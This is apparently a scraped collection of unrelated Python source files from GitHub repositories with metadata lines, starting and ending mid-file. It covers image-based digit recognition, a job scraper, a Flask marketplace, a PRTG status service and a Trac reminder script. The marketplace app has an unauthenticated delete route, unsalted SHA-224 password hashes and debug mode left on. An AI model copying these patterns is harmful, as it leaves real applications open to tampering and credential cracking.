len(getfullargspec(search_algs[search_alg]).args) == 2: problem.solution(search_algs[search_alg](problem, functions[search_alg]).solution(), output) else: problem.solution(search_algs[search_alg](problem).solution(), output)
Python
53
37.792454
140
/main.py
0.671533
0.671046
DiegoArcelli/BlocksWorld
refs/heads/main
import cv2 as cv import numpy as np import matplotlib.pyplot as plt import glob from tensorflow import keras from math import ceil deteced = [np.array([]) for x in range(6)] # lista che contiene le immagini delle cifre poisitions = [None for x in range(6)] # lista che contiene la posizione delle cifre nell'immagine debug_mode = False model = keras.models.load_model("./model/model.h5") # carica il modello allenato sul datase del MNIST # funzione che si occupa del riconoscimento della cifra presente nell'immagine # che gli viene passato come parametro def predict(image): h, w = image.shape l = int(max(image.shape)*1.2) n_h = int((l - h)/2) n_w = int((l - w)/2) img = np.zeros((l, l), np.uint8) img[n_h : n_h + h, n_w : n_w + w] = image img = (img / 255).astype('float64') img = cv.resize(img, (28, 28), interpolation = cv.INTER_AREA) _in = np.array([img]) _in = np.expand_dims(_in, -1) digit = np.argmax(model.predict(_in)) if debug_mode: print(digit) show(img) return digit - 1 if digit > 0 else -1 # stampa a schermo l'immagine che gli veiene passata come parametro def show(img): figManager = plt.get_current_fig_manager() figManager.full_screen_toggle() plt.xticks([]) plt.yticks([]) plt.imshow(img) plt.show() # prime modifiche all'immagine che consistono nell'applicazione di blur def preprocess(image): image = cv.medianBlur(image, 3) image = cv.GaussianBlur(image, (3, 3), 0) return 255 - image def postprocess(image): image = cv.medianBlur(image, 5) image = cv.medianBlur(image, 5) kernel = np.ones((3, 3), np.uint8) image = cv.morphologyEx(image, cv.MORPH_OPEN, kernel) kernel = np.ones((3, 3), np.uint8) image = cv.erode(image, kernel, iterations=2) return image def get_block_index(image_shape, yx, block_size): y = np.arange(max(0, yx[0]-block_size), min(image_shape[0], yx[0]+block_size)) x = np.arange(max(0, yx[1]-block_size), min(image_shape[1], yx[1]+block_size)) return np.meshgrid(y, x) def adaptive_median_threshold(img_in): med = np.median(img_in) threshold = 40 img_out 
= np.zeros_like(img_in) img_out[img_in - med < threshold] = 255 return img_out def block_image_process(image, block_size): out_image = np.zeros_like(image) for row in range(0, image.shape[0], block_size): for col in range(0, image.shape[1], block_size): idx = (row, col) block_idx = get_block_index(image.shape, idx, block_size) out_image[block_idx] = adaptive_median_threshold(image[block_idx]) return out_image def clean(image): contours, hierarchy = cv.findContours( image, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) for contour in contours: approx = cv.approxPolyDP( contour, 0.001 * cv.arcLength(contour, True), True) x, y, w, h = cv.boundingRect(approx) if search_noise(contour, approx, image.shape[::-1]): cv.drawContours(image, [approx], 0, 255, -1) return image def search_noise(contour, approx, image_size): i_h, i_w = image_size x, y, w, h = cv.boundingRect(approx) image_area = i_w*i_h if cv.contourArea(contour) >= image_area/1000: return False if w >= i_w/50 or h >= i_h/50: return False return True def find_digits(image, org_image, org): contours, hierarchy = cv.findContours(image, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) i = 0 for contour in contours: approx = cv.approxPolyDP(contour, 0.001 * cv.arcLength(contour, True), True) x, y, w, h = cv.boundingRect(approx) if hierarchy[0][i][3] == -1: prev = predict(org_image[y:y+h, x:x+w]) if prev != -1: deteced[prev] = org[y:y+h, x:x+w] poisitions[prev] = (x, y, x + w, y + h) i += 1 # funzione che individua il box che contiene i blocchi ed individua le cifre def find_box(image): o_h, o_w = image.shape[0:2] contours, hierarchy = cv.findContours( image, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) contours.sort(reverse=True, key=lambda c: cv.contourArea(c)) contour = contours[1] approx = cv.approxPolyDP( contour, 0.001 * cv.arcLength(contour, True), True) x, y, w, h = cv.boundingRect(approx) box = (x, y, x + w, y + h) img = image[y:y+h, x:x+w] sub = img.copy() bg = ~np.zeros((h + 50, w + 50), np.uint8) bg[25: 25 + h, 25: 25 + w] = img img = bg 
i = 0 i_h, i_w = img.shape[0:2] tot = np.zeros(shape=(i_h, i_w)) if debug_mode: print(image) contours, hierarchy = cv.findContours(img, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) for contour in contours: approx = cv.approxPolyDP( contour, 0.001 * cv.arcLength(contour, True), True) if hierarchy[0][i][3] == 0: cv.drawContours(tot, [approx], 0, 255, -1) if hierarchy[0][i][3] == 1: cv.drawContours(tot, [approx], 0, 0, -1) i += 1 tot = tot[25: 25 + h, 25: 25 + w] kernel = np.ones((5, 5), np.uint8) tot = cv.dilate(tot, kernel, iterations=3) tot = tot.astype('uint32') sub = sub.astype('uint32') res = sub + tot res = np.where(res == 0, 255, 0) result = np.zeros((o_h, o_w), np.uint8) result[y:y+h, x:x+w] = res if debug_mode: show(result) return (result, box) def get_block_borders(dims, image): x_i, y_i, x_f, y_f = dims kernel = np.ones((5, 5), np.uint8) image = cv.erode(image, kernel, iterations=1) y_m = (y_f + y_i) // 2 x_m = (x_f + x_i) // 2 t = x_i - 1 while image[y_m, t] != 255: t-=1 x_i = t t = x_f + 1 while image[y_m, t] != 255: t+=1 x_f = t t = y_i - 1 while image[t, x_m] != 255: t-=1 y_i = t t = y_f + 1 while image[t, x_m] != 255: t+=1 y_f = t return (x_i, y_i, x_f, y_f) def process_image_file(filename): global deteced, poisitions, explored, debug_mode block_size = 50 deteced = [np.array([]) for x in range(6)] poisitions = [None for x in range(6)] explored = [] image_in = cv.cvtColor(cv.imread(filename), cv.COLOR_BGR2GRAY) if debug_mode: show(image_in) image_in_pre = preprocess(image_in) image_out = block_image_process(image_in_pre, block_size) image_out = postprocess(image_out) image_out = clean(image_out) if debug_mode: show(image_out) digits, box = find_box(image_out) find_digits(digits, ~image_out, image_in) for i in range(6): if deteced[i].size > 0: image = deteced[i] x, y, w, h = get_block_borders(poisitions[i], ~image_out) poisitions[i] = (x, y, w, h) cv.rectangle(image_in, (x, y), (w, h), 255, 2) if debug_mode: show(image_in) return box def 
check_intersection(values): v1_i, v1_f, v2_i, v2_f = values v2_m = (v2_i + v2_f) // 2 if v1_i < v2_m and v1_f > v2_m: return True return False def create_state(poisitions, box): cols = [[] for x in range(6)] mean_points = [] for i in range(6): if poisitions[i] is not None: x1_i, y1_i, x1_f, y1_f = poisitions[i] mean_points.append(((x1_f + x1_i) // 2, ((y1_f + y1_i) // 2))) c = [i+1] for j in range(6): if poisitions[j] is not None and j != i: x2_i, y2_i, x2_f, y2_f = poisitions[j] if check_intersection((x1_i, x1_f, x2_i, x2_f)): c.append(j+1) c.sort() cols[i] = tuple([*c]) else: cols[i] = () temp_cols = list(set(tuple(cols))) if () in temp_cols: temp_cols.remove(()) cols = [] for t_col in temp_cols: col = list(t_col) col.sort(reverse=True, key=lambda e: mean_points[e-1][1]) cols.append(tuple(col)) cols.sort(key=lambda e: mean_points[e[0]-1][0]) bottoms = [col[0] for col in cols] distances = [] xb_i, _, xb_f, _ = box x_i, _, x_f, _ = poisitions[bottoms[0]-1] dist = abs(x_i - xb_i) dist = dist / (x_f - x_i) distances.append(dist) for i in range(len(bottoms)-1): x1_i, _, x1_f, _ = poisitions[bottoms[i]-1] x2_i, _, _, _ = poisitions[bottoms[i+1]-1] dist = abs(x2_i - x1_f) dist = dist / (x1_f - x1_i) distances.append(dist) x_i, _, x_f, _ = poisitions[bottoms[-1]-1] dist = abs(xb_f - x_f) dist = dist / (x_f - x_i) distances.append(dist) for i in range(len(distances)): dist = distances[i] if dist - int(dist) >= 0.5: distances[i] = int(dist) + 1 else: distances[i] = int(dist) n = sum(distances) + len(cols) i = distances[0] state = [] pos = 1 for col in cols: j = 0 for block in col: state.append((block, j, i)) j += 1 i += distances[pos] + 1 pos += 1 state.append(n) return tuple(state) def prepare_image(file_path, debug): global debug_mode debug_mode = True if debug else False box = process_image_file(file_path) state = create_state(poisitions, box) return state
Python
308
29.344156
101
/load_state.py
0.561845
0.535202
otar/python-weworkremotely-bot
refs/heads/master
import sys, datetime, requests from bs4 import BeautifulSoup from pymongo import MongoClient # Fetch website HTML and parse jobs data out of it def fetch(keyword): SEARCH_URL = 'https://weworkremotely.com/jobs/search?term=%s' CSS_QUERY = '#category-2 > article > ul > li a' response = requests.get(SEARCH_URL % (keyword), timeout=10) if response.status_code != requests.codes.ok: return False html = BeautifulSoup(response.text) jobs = html.select(CSS_QUERY) # If there's only one item in the list, then it's just a category if len(jobs) <= 1: return False # We don't need the category... del jobs[-1] months = { 'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12' }; current_date = datetime.datetime.now() result = [] for job in jobs: job_id = job['href'].strip('/').split('/')[1].strip() if not job_id: continue job_details = job.find_all('span') # We should have exactly 3 "span" tags if len(job_details) != 3: continue date_parts = ' '.join(job_details[2].string.split()).split(' ') # Ugly hack, I know... 
but works perfectly if len(date_parts[1]) == 1: date_parts[1] = str('0' + date_parts[1]) result.append({ 'job_id': job_id, 'title': job_details[1].string.strip(), 'company': job_details[0].string.strip(), 'date': '%s-%s-%s' % (current_date.year, months[date_parts[0]], date_parts[1]) }) return result # Insert jobs in the database def insert(jobs): db = MongoClient() for job in jobs: db.we_work_remotely.jobs.update( { 'job_id': job['job_id'] }, { '$setOnInsert': job }, True ) # Helper function to terminate program execution gracefully def exit_program(message='You shall not pass!'): print(message) sys.exit(0) # Handle search keyword argument SEARCH_TERM = 'php' if len(sys.argv) == 2: SEARCH_TERM = sys.argv[1].strip() # Main script controller def main(): try: jobs = fetch(SEARCH_TERM) if jobs == False: exit_program() insert(jobs) except: exit_program('Blame it on a boogie!..') # Gimme some lovin' if __name__ == '__main__': main()
Python
102
24.441177
90
/bot.py
0.529276
0.511556
jlstack/Online-Marketplace
refs/heads/master
from application import db class Product(db.Model): id = db.Column('id', db.Integer, primary_key=True) name = db.Column('name', db.String(128), nullable=False) description = db.Column('description', db.TEXT, nullable=False) image_path = db.Column('image_path', db.String(128), nullable=True) quantity = db.Column('quantity', db.Integer, default=1) price = db.Column('price', db.FLOAT, default=0.0) def __init__(self, name, description, image_path='', quantity=1, price=0.0): self.name = name self.description = description self.image_path = image_path self.quantity = quantity self.price = price def __repr__(self): return str({'name':self.name, 'description':self.description, 'image_path': self.image_path, 'quantity': self.quantity, 'price': self.price}) class User(db.Model): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(128), index=True, unique=True) password = db.Column(db.String(256), nullable=False) def __init__(self, username, password): self.username = username self.password = password def __repr__(self): return '<User %r>' % (self.username) class Image(db.Model): id = db.Column('id', db.Integer, primary_key=True) name = db.Column('name', db.String(128), nullable=False) image_path = db.Column('image_path', db.String(128), nullable=False) display_number = db.Column('display_number', db.Integer, nullable=False) def __init__(self, name, image_path, display_number): self.name = name self.image_path = image_path self.display_number = display_number def __repr__(self): return str({'name': self.name, 'image_path': self.image_path, 'display_number': self.display_number})
Python
45
39.288887
149
/application/models.py
0.644236
0.630998
jlstack/Online-Marketplace
refs/heads/master
from flask import Flask, Response, session, flash, request, redirect, render_template, g import sys import os import base64 from flask_login import LoginManager, UserMixin, current_user, login_required, login_user, logout_user import hashlib from flask_openid import OpenID errors = [] try: from application import db from application.models import Product, User, Image import yaml with open("db.yml") as db_file: db_entries = yaml.safe_load(db_file) db.create_all() for user in db_entries["users"]: usr = User(user["username"], user["password_hash"]) db.session.add(usr) db.session.commit() for project in db_entries["projects"]: proj = Product(project["name"], project["description"], project["default_image"], 1, 0) db.session.add(proj) db.session.commit() for i in range(0, len(project["images"])): img = Image(project['name'], project["images"][i], i) db.session.add(img) db.session.commit() db.session.close() except Exception as err: errors.append(err.message) # EB looks for an 'application' callable by default. 
application = Flask(__name__) # config application.config.update( DEBUG = True, SECRET_KEY = os.urandom(24) ) @application.route("/login", methods=["GET", "POST"]) def login(): if str(request.method) == 'GET': if not session.get('logged_in'): return render_template('login.html') else: redirect("/") username = request.form['username'] password = request.form['password'] password = hashlib.sha224(password.encode('utf-8')).hexdigest() user = User.query.filter_by(username=username, password=password).first() if user is not None: session['logged_in'] = True return redirect("/") return redirect("/login") @application.route("/logout") def logout(): session['logged_in'] = False return redirect('/') @application.route('/') def index(): return render_template('home.html') @application.route('/gallery') def gallery(): products = Product.query.order_by(Product.id.asc()) return render_template('products.html', products=products) @application.route('/about') def about(): return render_template('about.html') @application.route('/contact') def contact(): return render_template('contact.html') @application.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @application.route('/dir') def stuff(): return str(dir(Product.id)) @application.route('/add', methods=['GET', 'POST']) def add(): if not session.get('logged_in'): return render_template('login.html') if str(request.method) == 'POST': try: vals = request.form.to_dict() files = request.files.getlist("image") for i in range(0, len(files)): file = files[i] ext = file.filename.rsplit('.', 1)[1].lower() if ext in ['png', 'jpg', 'jpeg']: filename = "/static/images/" + base64.urlsafe_b64encode(file.filename) + "." + ext file.save("." 
+ filename) if i == 0: product = Product(vals['name'], vals['description'], filename, 1, 0) db.session.add(product) db.session.commit() db.session.close() img = Image(vals['name'], filename, i) db.session.add(img) db.session.commit() db.session.close() except Exception as err: db.session.rollback() return err.message return render_template('add_product.html') @application.route('/errors') def get_errors(): return str(errors) @application.route('/products') def get_products(): products = Product.query.order_by(Product.id.desc()) stuff = [x.name for x in products] return str(stuff) @application.route('/pin/<pin_id>') def pin_enlarge(pin_id): p = Product.query.filter_by(id=pin_id).first() images = Image.query.filter_by(name=p.name).order_by(Image.display_number.asc()) return render_template('pin_focus.html', p=p, images=images) @application.route('/delete/<pin_id>') def delete(pin_id): Product.query.filter_by(id = pin_id).delete() db.session.commit() db.session.close() return redirect("/gallery") # run the app. if __name__ == "__main__": # Setting debug to True enables debug output. This line should be # removed before deploying a production app. application.debug = True application.run()
Python
147
30.612246
102
/application.py
0.614805
0.60835
jlstack/Online-Marketplace
refs/heads/master
from flask import Flask from flask.ext.sqlalchemy import SQLAlchemy import os def get_config(): config = {} if 'RDS_HOSTNAME' in os.environ: env = { 'NAME': os.environ['RDS_DB_NAME'], 'USER': os.environ['RDS_USERNAME'], 'PASSWORD': os.environ['RDS_PASSWORD'], 'HOST': os.environ['RDS_HOSTNAME'], 'PORT': os.environ['RDS_PORT'], } config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://' + env['USER'] + ':' + env['PASSWORD'] + '@' + env['HOST'] + ':' + env['PORT'] + '/' + env['NAME'] config['SQLALCHEMY_POOL_RECYCLE'] = 3600 config['WTF_CSRF_ENABLED'] = True else: config = None return config config = get_config() application = Flask(__name__) db = None if config is not None: application.config.from_object(config) try: db = SQLAlchemy(application) except Exception as err: print(err.message)
Python
30
29.4
160
/application/__init__.py
0.588816
0.58443
viaacode/status
refs/heads/master
from locust import HttpLocust, TaskSet, task class WebsiteTasks(TaskSet): @task def index(self): self.client.get("/") @task def status(self): self.client.get("/status") @task def hetarchief(self): self.client.get("/status/hetarchief.png") @task def ftp(self): self.client.get("/status/ftp.png") class WebsiteUser(HttpLocust): task_set = WebsiteTasks min_wait = 5000 max_wait = 15000
Python
23
19.52174
49
/locustfile.py
0.605932
0.586864
viaacode/status
refs/heads/master
import requests import json import functools import logging # from collections import defaultdict # from xml.etree import ElementTree # ref: https://stackoverflow.com/questions/7684333/converting-xml-to-dictionary-using-elementtree # def etree_to_dict(t): # d = {t.tag: {} if t.attrib else None} # children = list(t) # if children: # dd = defaultdict(list) # for dc in map(etree_to_dict, children): # for k, v in dc.items(): # dd[k].append(v) # d = {t.tag: {k: v[0] if len(v) == 1 else v # for k, v in dd.items()}} # if t.attrib: # d[t.tag].update(('@' + k, v) # for k, v in t.attrib.items()) # if t.text: # text = t.text.strip() # if children or t.attrib: # if text: # d[t.tag]['#text'] = text # else: # d[t.tag] = text # return d logger = logging.getLogger(__name__) entrypoint = '/api' class PRTGError(Exception): pass class PRTGAuthenticationError(PRTGError): pass class ResponseTypes: @staticmethod def json(data): return json.loads(data) # @staticmethod # def xml(data): # return etree_to_dict(ElementTree.XML(data)) class API: def __init__(self, host, username, passhash): self._requests = requests self._host = host self._authparams = { "username": username, "passhash": passhash } @property def requests(self): return self._requests @requests.setter def requests(self, val): self._requests = val def _call(self, method, response_type=None, **params): if response_type is None: response_type = 'json' if not hasattr(ResponseTypes, response_type): raise ValueError("Unknown response type", response_type) url = '%s%s/%s.%s' % (self._host, entrypoint, method, response_type) try: params = dict(params, **self._authparams) response = self._requests.get(url, params=params) if response.status_code != 200: logger.warning("Wrong exit code %d for %s", response.status_code, url) raise PRTGError("Invalid HTTP code response", response.status_code) return getattr(ResponseTypes, response_type)(response.content.decode('utf-8')) except Exception as e: raise PRTGError(e) from e def __getattr__(self, 
item): return functools.partial(self._call, item) @staticmethod def from_credentials(host, username, password, _requests=None): url = '%s%s/getpasshash.htm' % (host, entrypoint) params = { "username": username, "password": password, } if _requests is None: _requests = requests.Session() response = _requests.get(url, params=params) if response.status_code != 200: raise PRTGAuthenticationError("Couldn't authenticate", response.status_code, response.content) result = API(host, username, response.content) result.requests = _requests return result
Python
108
28.666666
106
/src/viaastatus/prtg/api.py
0.575663
0.570671
viaacode/status
refs/heads/master
from argparse import ArgumentParser from viaastatus.server import wsgi import logging def argparser(): """ Get the help and arguments specific to this module """ parser = ArgumentParser(prog='status', description='A service that supplies status information about our platforms') parser.add_argument('--debug', action='store_true', help='run in debug mode') parser.add_argument('--host', help='hostname or ip to serve api') parser.add_argument('--port', type=int, default=8080, help='port used by the server') parser.add_argument('--log-level', type=str.lower, default='warning', dest='log_level', choices=list(map(str.lower, logging._nameToLevel.keys())), help='set the logging output level') return parser def main(): args = argparser().parse_args() logging.basicConfig(level=args.log_level.upper()) logging.getLogger().setLevel(args.log_level.upper()) del args.log_level wsgi.create_app().run(**args) if __name__ == '__main__': main()
Python
34
32.088234
120
/src/viaastatus/server/cli.py
0.616889
0.613333
viaacode/status
refs/heads/master
from setuptools import setup, find_packages with open('README.md') as f: long_description = f.read() with open('requirements.txt') as f: requirements = list(map(str.rstrip, f.readlines())) setup( name='viaastatus', url='https://github.com/viaacode/status/', version='0.0.3', author='VIAA', author_email='support@viaa.be', descriptiona='Status services', long_description=long_description, classifiers=[ 'Programming Language :: Python', 'Programming Language :: Python :: 3', ], python_requires='>=3.4', packages=find_packages("src"), package_dir={"": "src"}, package_data={'viaastatus': ['server/static/*']}, include_package_data=True, install_requires=requirements, extras_require={ 'test': [ "pytest>=4.2.0" ], 'loadtest': [ "locustio>=0.11.0" ], 'gunicorn': [ 'gunicorn>=19.9.0' ], 'uwsgi': [ 'uWSGI>=2.0.18' ], 'waitress': [ 'waitress>=1.2.1' ] }, platforms='any' )
Python
45
23.48889
55
/setup.py
0.534483
0.512704
viaacode/status
refs/heads/master
from flask import Flask, abort, Response, send_file, request, flash, session, render_template from flask import url_for, redirect from viaastatus.prtg import api from viaastatus.decorators import cacher, templated from os import environ import logging from configparser import ConfigParser import re import hmac from hashlib import sha256 from functools import wraps, partial import argparse import itertools import werkzeug.contrib.cache as workzeug_cache from viaastatus.server.response import Responses import requests log_level = logging._nameToLevel[environ.get('VERBOSITY', 'debug').upper()] logging.basicConfig(level=log_level) logger = logging.getLogger(__name__) logging.getLogger().setLevel(log_level) def normalize(txt): txt = txt.replace(' ', '-').lower() txt = re.sub('-{2,}', '-', txt) txt = re.sub(r'\([^)]*\)', '', txt) txt = re.sub(r'\[[^)]*\]', '', txt) txt = re.sub('-[0-9]*$', '', txt) txt = re.sub('-{2,}', '-', txt) return txt def create_app(): app = Flask(__name__) config = ConfigParser() config.read(environ.get('CONFIG_FILE', 'config.ini')) app_config = config['app'] cache_timeout = int(app_config.get('cache_timeout', 30)) if cache_timeout > 0: cache_ = workzeug_cache.SimpleCache(default_timeout=cache_timeout) else: cache_ = workzeug_cache.NullCache() cache = cacher(cache_)() cache_other = cacher(cache_, timeout=cache_timeout, key='other/%s')() app.secret_key = app_config['secret_key'] salt = app_config['salt'] @cache_other def get_sensors(prtg_) -> dict: sensors = {} cols = 'objid,name,device' ippattern = re.compile(r'[\d\.]+') for sensor in prtg_.table(content='sensors', filter_type=['http', 'ftp', 'httptransaction'], filter_active=-1, columns=cols)['sensors']: parentname = sensor['device'] sensor_name = sensor['name'] if sensor_name.startswith('HTTP'): # filter out IPs if ippattern.fullmatch(parentname): continue sensor_name = parentname + ' - ' + sensor_name sensor_name = normalize(sensor_name) if sensor_name in sensors: logger.warning("Sensor '%s' is 
conflicting (current id: %d, requested to set to: %d), ignored", sensor_name, sensors[sensor_name], sensor['objid']) continue sensors[sensor_name] = int(sensor['objid']) return sensors def _token(*args, **kwargs): """Calculates the token """ params = str([args, kwargs]) return hmac.new(salt.encode('utf-8'), params.encode('utf-8'), sha256).hexdigest()[2:10] def secured_by_login(func): """ Decorator to define routes secured_by_login """ @wraps(func) def _(*args, **kwargs): if not login_settings: logger.info('Login requested but refused since no login data in config') abort(404) if not session.get('authenticated'): return _login() return func(*args, **kwargs) return _ def secured_by_token(func): """ Decorator to define routes secured_by_token. """ @wraps(func) def _(*args, **kwargs): check_token = 'authenticated' not in session if 'ignore_token' in kwargs: check_token = not kwargs['ignore_token'] del kwargs['ignore_token'] if check_token: token = request.args.get('token') expected_token = _token(*args, **kwargs) if token != expected_token: logger.warning("Wrong token '%s' for %s, expected: '%s'", token, func.__name__, expected_token) abort(401) return func(*args, **kwargs) _._secured_by_token = _token return _ prtg_conf = config['prtg'] _requests = requests.Session() if 'certificate' in prtg_conf: _requests.cert = (prtg_conf['certificate'], prtg_conf['private_key']) prtg = api.API.from_credentials(prtg_conf['host'], prtg_conf['username'], prtg_conf['password'], _requests) login_settings = None if config.has_section('login'): login_settings = dict(config['login']) class Choices: @staticmethod def sensor(): return list(get_sensors(prtg).keys()) @staticmethod def type_(): return {'json', 'png', 'txt', 'html'} @staticmethod def ttype(): return {'json', 'txt', 'html'} @app.route('/login', methods=['GET']) @templated('login.html') def _login(): pass @app.route('/urls', methods=['GET']) @secured_by_login @templated('urls.html') def _urls(): context = {} rules = [rule for 
rule in application.url_map.iter_rules() if rule.is_leaf and rule.endpoint != 'static' and not rule.endpoint.startswith('_')] method_types = {} for i in range(len(rules)): rule = rules[i] rules[i] = rules[i].__dict__ kargs = [argname for argname in rule.arguments if hasattr(Choices, argname)] vargs = [getattr(Choices, argname)() for argname in kargs] methods = [] for params in itertools.product(*vargs): params = dict(zip(kargs, params)) url = url_for(rule.endpoint, **params) view_func = app.view_functions[rule.endpoint] if hasattr(view_func, '_secured_by_token'): url += '?token=%s' % (view_func._secured_by_token(**params)) methods.append({ "name": rule.endpoint, "params": params, "url": url, }) method_types[rule.endpoint] = methods context['method_types'] = method_types return context @app.route('/login', methods=['POST']) def _do_login(): if not login_settings: logger.info('Login requested but refused since no login data in config') abort(404) if request.form['password'] != login_settings['password'] or \ request.form['username'] != login_settings['username']: flash('Invalid credentials!') else: session['authenticated'] = True return redirect('/urls') @app.route('/', methods=['GET']) @cache @templated('oldstatus.html') def index_(): pass @app.route('/sensors.<ttype>') @cache @secured_by_token def sensors_(ttype): if ttype not in Choices.ttype(): abort(404) return getattr(Responses, ttype)(Choices.sensor()) @app.route('/status/<sensor>.<type_>', methods=['GET']) @cache @secured_by_token def status_(sensor, type_): """ :param str sensor: Name of the sensor :param str type_: Response type :return: """ if type_ not in Choices.type_(): abort(404) try: sensors = get_sensors(prtg) if sensor not in sensors: abort(404) sensor_id = sensors[sensor] status = prtg.getsensordetails(id=sensor_id)['sensordata'] except Exception as e: if type_ == 'png': return Responses.status(None) raise e if type_ == 'png': if int(status['statusid']) in [3, 4]: status = True elif 
int(status['statusid']) in [7, 8, 9, 10, 12]: status = None else: status = False return Responses.status(status) if type_ == 'txt': status = status['statustext'] elif type_ == 'html': status_msg = ''' <dl> <dt>%s</dt> <dd><a href="%s/sensor.htm?id=%d">%s</a></dd> </dl> ''' status = status_msg % (prtg._host, sensor, sensor_id, status['statustext']) return getattr(Responses, type_)(status) @app.route('/status', methods=['GET']) @templated('statuspage.html') def status_page(): if not config.has_section('aliases'): abort(404) aliases = {url: fwd.split(':')[1] for url, fwd in config['aliases'].items()} return dict(aliases=aliases) # add aliases if config.has_section('aliases'): for url, target in config['aliases'].items(): target = target.split(':') name = target.pop(0) func = app.view_functions[name] kwargs = dict(ignore_token=True) func = partial(func, *target, **kwargs) func.__name__ = url app.route(url)(func) return app application = create_app() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--debug', action='store_true', help='run in debug mode') parser.add_argument('--host', help='hostname or ip to serve app') parser.add_argument('--port', type=int, default=1111, help='port used by the server') args = parser.parse_args() if args.debug: logging.basicConfig(level=logging.DEBUG) logger.setLevel(logging.DEBUG) application.run(host=args.host, port=args.port, debug=args.debug)
Python
308
30.733767
115
/src/viaastatus/server/wsgi.py
0.534015
0.528389
viaacode/status
refs/heads/master
from functools import wraps, partial from flask import request, render_template def cached(key='view/%s', cache=None, **extra_cache_kwargs): def decorator(f): @wraps(f) def decorated(*args, **kwargs): cache_key = key % request.path rv = cache.get(cache_key) if rv is not None: return rv rv = f(*args, **kwargs) cache.set(cache_key, rv, **extra_cache_kwargs) return rv return decorated return decorator def cacher(cache, **kwargs): return partial(cached, cache=cache, **kwargs) def templated(template=None): def decorator(f): @wraps(f) def decorated(*args, **kwargs): template_name = template if template_name is None: template_name = request.endpoint \ .replace('.', '/') + '.html' ctx = f(*args, **kwargs) if ctx is None: ctx = {} elif not isinstance(ctx, dict): return ctx return render_template(template_name, **ctx) return decorated return decorator
Python
39
28.641026
60
/src/viaastatus/decorators.py
0.536332
0.536332
viaacode/status
refs/heads/master
import os from flask import jsonify, Response import flask class FileResponse(Response): default_mimetype = 'application/octet-stream' def __init__(self, filename, **kwargs): if not os.path.isabs(filename): filename = os.path.join(flask.current_app.root_path, filename) with open(filename, 'rb') as f: contents = f.read() response = contents super().__init__(response, **kwargs) class StatusResponse(FileResponse): default_mimetype = 'image/png' def __init__(self, status, **kwargs): if status is True: status = 'ok' elif status is False: status = 'nok' else: status = 'unk' filename = 'static/status-%s.png' % (status,) super().__init__(filename, **kwargs) class Responses: @staticmethod def json(obj): return jsonify(obj) @staticmethod def html(obj): return Response('<html><body>%s</body></html>' % (obj,), content_type='text/html') @staticmethod def txt(obj): if type(obj) is not str: obj = '\n'.join(obj) return Response(obj, content_type='text/plain') @staticmethod def status(status_): return StatusResponse(status_)
Python
53
22.981133
90
/src/viaastatus/server/response.py
0.581432
0.581432
esyr/trac-hacks
refs/heads/master
#!/usr/bin/env python # -*- coding: utf-8 -*- # # if you want to test this script, set this True: # then it won't send any mails, just it'll print out the produced html and text #test = False test = False #which kind of db is Trac using? mysql = False pgsql = False sqlite = True # for mysql/pgsql: dbhost="localhost" dbuser="database_user" dbpwd="database_password" dbtrac="database_of_trac" #or for sqlite: sqlitedb='/path/to/trac/db/trac.db' #or if your db is in memory: #sqlitedb=':memory:' # the url to the trac (notice the slash at the end): trac_url='https://trac.example.org/path/to/trac/' # the default domain, where the users reside # ie: if no email address is stored for them, username@domain.tld will be used to_domain="@example.org" import codecs, sys sys.setdefaultencoding('utf-8') import site # importing the appropriate database connector # (you should install one, if you want to use ;) # or you can use an uniform layer, like sqlalchemy) if mysql: import MySQLdb if pgsql: import psycopg2 if sqlite: from pysqlite2 import dbapi2 as sqlite import time import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText db = None cursor = None try: if mysql: db = MySQLdb.connect(host=dbhost, user=dbuser, passwd=dbpwd, db=dbtrac) if pgsql: db = psycopg2.connect("host='"+ dbhost +"' user='" + dbuser + "' password='" + dbpwd + "' dbname='" + dbtrac + "'") if sqlite: db = sqlite.connect(sqlitedb) except: print "cannot connect to db" raise sys.exit(1) cursor = db.cursor() fields = ['summary', 'component', 'priority', 'status', 'owner', 'reporter'] #I think MySQL needs '"' instead of "'" without any ';', # with more strict capitalization (doubling quotes mean a single quote ;) ) # so you'll have to put these queries into this format: # sql="""query""" or sql='"query"' like # sql = '"SELECT owner FROM ticket WHERE status !=""closed""""' # for postgresql simply use: sql = "select id, %s from ticket where status == 'testing' or status == 
'pre_testing';" % ', '.join(fields) cursor.execute(sql) tickets = cursor.fetchall() tickets_dict = {} # Reading last exec time last_exec_path = '/var/local/trac_testing_tickets_notify_last_exec_timestamp' last_exec = 0 try: f = open(last_exec_path, "r") last_exec = int(f.read()) f.close() except: last_exec = 0 cur_time = int(time.time()) notify_tickets = set() time_quant = 86400 # seconts per day - frequence of reminds ticket_url = 'https://trac.example.org/path/to/trac/ticket/' recipient_list = ['recipient1@example.org', 'recipient2@example.arg', ] for ticket in tickets: tickets_dict[ticket[0]] = {'id': ticket[0]} offset = 1 for field in fields: tickets_dict[ticket[0]][field] = ticket[offset] offset += 1 sql = "select time from ticket_change where ticket == %d and field == 'status' and (newvalue == 'testing' or newvalue == 'pre_testing') order by time desc limit 1;" % ticket[0] cursor.execute(sql) last_time = cursor.fetchall() if len(last_time) > 0: last_time = last_time[0][0] if (int((cur_time - last_time) / time_quant) != int((last_exec - last_time) / time_quant)) and int((cur_time - last_time) / time_quant) > 0: notify_tickets |= set([ticket[0], ]) # No new tickets - aborting if len(notify_tickets) == 0: print 'No new tickets: aborting.' exit() #calculating column widths column_widths = {} for id in notify_tickets: for field, value in tickets_dict[id].iteritems(): column_widths[field] = field in column_widths and max(column_widths[field], len("%s" % value)) or max(len("%s" % value), len("%s" % field)) #generating mail text msg_header = """ List of tickets pending your attention: """ msg_tail = """ Trac testing tickets notification script. 
